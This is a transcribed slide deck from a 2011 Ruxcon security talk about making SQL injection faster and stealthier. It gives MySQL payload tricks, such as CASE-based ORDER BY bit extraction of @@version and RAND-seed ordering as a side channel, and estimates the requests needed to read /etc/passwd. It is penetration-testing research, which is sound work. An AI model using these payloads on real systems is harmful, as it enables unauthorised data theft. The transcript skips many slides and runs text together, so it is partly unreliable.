Top Banner
Louis <> Luke <>

Harder Faster Stronger

Jul 03, 2015




Talk done by Luke Jahnke and I in 2011 at Ruxcon on optimisation of SQL injections
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
  • 1. Louis Luke

2. SELECT user FROM mysql.user LIMIT 2 Security consultants working for Securus Global inMelbourne Have done/are doing a lot a web pentesting Research focus on web security: Web Attacks Web Application Scanners (WAS) testing Web Application Firewall (WAF) testing (In)Secure coding 3. Why do we want to optimize SQL injections? Stealth Retrieving a large amount of data Being faster Because youre bored using sqlmap Because its fun 4. What can be optimized? Length of the injection Number of requests to retrieve information Optimize retrieval strategy Optimizations on information 5. Reducing injection length (MySQL) SUBSTR() instead of SUBSTRING() MID() instead of SUBSTR() Using CRC32() Instead of using the long string you replace it withthe CRC32 6. Reducing injection length (MySQL) SELECT@@version instead ofSELECT VERSION() &&1 instead of AND 1=1 &1 instead of &&1 ||1 instead of OR 1=1 |1 instead of ||1 (fails for NULL|1) 7. Reducing injection length (MySQL) !id instead of id=0 > instead of 4 states order by can sort by multiple columns: order by firstname, lastname => more states (8 if lucky) Color Blind SQLi (copyright Nicolas Collignon) 26. Exploitation For each combinations of order by: fingerprint the response (with cast for id) md5 for global warming SQL has a case statement:CASE (ASCII(substring((select @@version),1,1))&4)WHEN 0 then column1WHEN 1 then column2WHEN 2 then column3WHEN 3 then column4END 27. Exploitation## Retrieving ----XXXXCASE (ASCII(substring((select @@version),1,1))&3) when0 then id when 1 then name when 2 then age when 3then groupid END ASC, CASE ((ASCII(substring((select@@version),1,1))&12)>>2) when 0 then id when 1 thenname when 2 then age when 3 then groupid END ASC## Retrieving XXXX----CASE ((ASCII(substring((select @@version),1,1))&48)>>4)when 0 then id when 1 then name when 2 then age when3 then groupid END ASC, CASE((ASCII(substring((select @@version),1,1))&192)>>6)when 0 then id when 1 then name when 2 then age when3 then groupid END ASC Securus Global 2010 28. ExploitationSELECT id,usernameFROM usersidusername1 admin2 moderator3 guest 29. ExploitationSELECT id,usernameFROM usersORDER BY RAND()idusername2 moderator1 admin3 guest 30. ExploitationSELECT id,usernameFROM usersORDER BY RAND()idusername3 guest2 moderator1 admin 31. ExploitationSELECT id,usernameFROM usersORDER BY RAND(1)idusername3 guest1 admin2 moderator 32. ExploitationSELECT id,usernameFROM usersORDER BY RAND(1)idusername3 guest1 admin2 moderator 33. ExploitationRAND seed Order of id0 1,2,31 3,1,22 2,3,13 3,2,14 1,2,3 34. ExploitationRAND seedOrder of id Bits01,2,3 0013,1,2 0122,3,1 1033,2,1 11 35. ExploitationRAND(CONV(CONCAT(IF((true/false),0,1),IF((true/false),0,1)),2,10)) 36. Exploitation 37. StatisticsRowsBits2-6 17 58 59 91011111212131317 38. Real World Scenario 7 rows Can retrieve 5 bits per request 1830 characters (14640 bits) in /etc/passwd Retrieve with 2930 requests 740 characters for compressed /etc/passwd Retrieved with 1186 requests 39. Source available tomorrow at: 40. Questions?